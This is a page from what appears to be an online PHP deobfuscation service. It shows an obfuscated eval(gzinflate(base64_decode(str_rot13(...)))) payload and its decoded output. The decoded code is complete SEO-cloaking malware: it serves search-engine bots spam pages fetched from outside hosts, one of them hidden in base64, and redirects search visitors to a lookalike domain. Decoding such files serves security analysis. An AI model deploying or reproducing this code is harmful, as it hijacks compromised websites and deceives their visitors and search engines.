Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(base64_decode(str_rot13('yIKko9b6RC6qi8XAHW1bAAOdaq6XbdyiYkhInApKLR/..
Decoded Output download
set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
define('URI', $_SERVER['REQUEST_URI']);
define('host', base64_decode('aHR0cHM6Ly9pbmluc2VvaW5pbi5jb20v'));
define('MULU','app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|data|-\d(?!\d)');
function isEngines($key){
return stristr($key, 'Googlebot') !== false || stristr($key, 'Bingbot') !== false || stristr($key, 'Yahoo!') !== false;
}
function isIncludes(){
$re = 0;
$temp = explode('|', MULU);
foreach($temp as $v){
if(preg_match('/' . $v . '/', URI)){
$re = 1;
}
}
return $re;
}
function isRef($ref){
return stristr($ref, 'google') !== false || stristr($ref, 'bing') !== false || stristr($ref, 'yahoo') !== false;
}
function getContents($url){
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$result = curl_exec($ch);
curl_close($ch);
if($result == NULL){
return file_get_contents($url);
}
return $result;
} else {
return file_get_contents($url);
}
}
$ref = $_SERVER["HTTP_REFERER"];
$key = $_SERVER["HTTP_USER_AGENT"];
$ym = $_SERVER['HTTP_HOST'];
if (isEngines($key)) {
header('Content-Type:text/html;charset=utf-8');
if(isIncludes()){
echo getContents(host."?xhost=".$ym.'&reurl='.URI.'&ua=Googlebot'.'&f=google');
exit;
} else {
echo file_get_contents("https://in.ininseoinin.com/suijiurl/zz.php");
}
} else {
if(isIncludes() && isRef($ref)){
header("Location: https://in.googleeplay.com/xiaoji.html");
exit;
}
}
Did this file decode correctly?
Original Code
<?php
eval(gzinflate(base64_decode(str_rot13('yIKko9b6RC6qi8XAHW1bAAOdaq6XbdyiYkhInApKLR/G2kFM5RYpWaRHBjJ69U/sBHNWITuqWOYf+3m2sssqJLYlSH/OG3wXyqzm+v0bPyU4OrFvHQlo1KZkfONX0/tbZtJMBuxip7ttPundT6f06DpkXlDbc1GElI8TYzvSRCRZGQekezvUgC2E6311is+c5/47pHqwK8//DBNTSjhcRQuyRg699HZVEVvmoBQ1tfU1h+UlsG5AxmV4+/eN/wiCc/m8oaeJr6OJj8K1MQvuUpeliBWPIvjYP8UQXuGmYORfeXLWl+6eXntdLWWabcdkSTFIW2kMCsNDEWJYrlvdDtuIMGPKIptHd06+u+nUb++uEKIpHMxSvbhZpByzZ9kKzh17JSb/JjFsNyEMMRFdthBigaDV/FmRYVTcHADvE45QVcMVVSJ1w/fo6s496uhYuGudtidgc52QKJIOHbM4fiJc2tHDu/G6d4TPAZpuYCXx5euP2wI11fbrvDWLRWfeUWBx/oO2bk8rzKxOZm9yPwT0F4zANUmu3j7OcSbA8Uoi0/7m5SAe+17GuMw9RQlVGWlBQiPXSzEvIiA6xX4InVdx/tnl1VjrWaDTnd17mUIMWBfm8LvLT4jCP3DbGEdt3rpMklEnMZgRB4vEuJrwnJ35dPrkqxFhGVE1lZrWA/klvkJPWKC52o0Mq4ukYE55xeQhhq0wMvQFaPx+GnOCadKICoAC++EAeSE+0r3B53A7kL6A6P7noI2ayiTdwo0uIdjB9OKttKi5w+g1FB81LZ8qG7lofKq5Z/dxS52+MgSbACFkqIk9+aoe6xI1ui5f4rQYnCklVJMsybanWNLJRTtU+66QERwLZ/OnaniIQezMQVq7fy8YAhVW+XtsC9tE0U417AnPqegPCOUDvi3M+uB3G1d8JgxL2UCsADow8F3lw7F7aiTw39YA5PINn86iEIqwyzxGDzhV5cXvfnK1i9pRA5WsKkq057b4pSiD9oTE0zoaniNWDFk2vyQsSookLnT/wzUwZJ16KNOF4SNorkPBFhMfhl6BV2sGYYopL80r4ear8vKYuv4ivsKSZkieBWZt9XrhZIalB45U6Q4+2azpT9gfAW3iEHzBw5iAeuU05fLqvbQcQaAOTahiLtS9p9I7YmtGq7jhprANtNEI8Df='))));
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | a8f5d8962ac808c955f177cc14404fe0 |
Eval Count | 1 |
Decode Time | 45 ms |